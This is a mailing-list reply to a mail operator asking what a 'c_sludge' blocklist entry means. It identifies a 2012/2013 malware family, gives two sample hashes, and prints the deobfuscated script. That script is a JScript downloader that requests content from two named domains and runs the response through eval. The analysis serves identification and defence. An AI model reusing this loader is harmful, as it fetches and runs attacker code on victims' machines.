I'm not sure if this answers your question, but there is a virus with that signature name from 2012/2013, e.g 'VBS_SLUDGE.C' (trendmicro).
samples (available via vt):
dc8da24b429b9e8c41a7ec87e0c69472ea47fe0d
7b7a22e0c819800cc25c55994cdb5ccb3f936ee4
the obfuscated vbs comes down to:
<job><script language=JScript>var z2 = eval; var x = new
Array("pinkcamille.com","sculpture-museum.org"); var z1 =
"Msxml2.XMLHTTP"; var m =
"LRYH8RItAFhs50laDTB44ry5AA1qQc18YnLyKXUMHNLcHT4DRycNKIqJg-BJUqMrC6UwAxAqzbATIx_IUHI";
for (var i=0; i<2; i++) { try { var e = new ActiveXObject(z1);
e.open("GET", "http://"+x[i]+"/counter/?"+m+"1";, false); e.send(); if
(e.status == 200) { z2(e.responseText.split(m).join("a")); break; }; }
catch(e) { }; };</script></job>
hth,
Stefan
On 07/07/2017 03:37 PM, Kirk MacDonald wrote:
> Struggling a bit to understand a development this morning about MTAs being
> listed on Spamhaus for a CBL listing for something called c_sludge. The
> Googles has really nothing helpful about what c_sludge is.
>
> Thoughts? Tips?
>
>
> Kirk MacDonald
> System Analyst II
> Internet
> Eastlink
>
> _______________________________________________
> mailop mailing list
> mailop@mailop.org
> https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
>
signature.asc
Description: OpenPGP digital signature
_______________________________________________ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
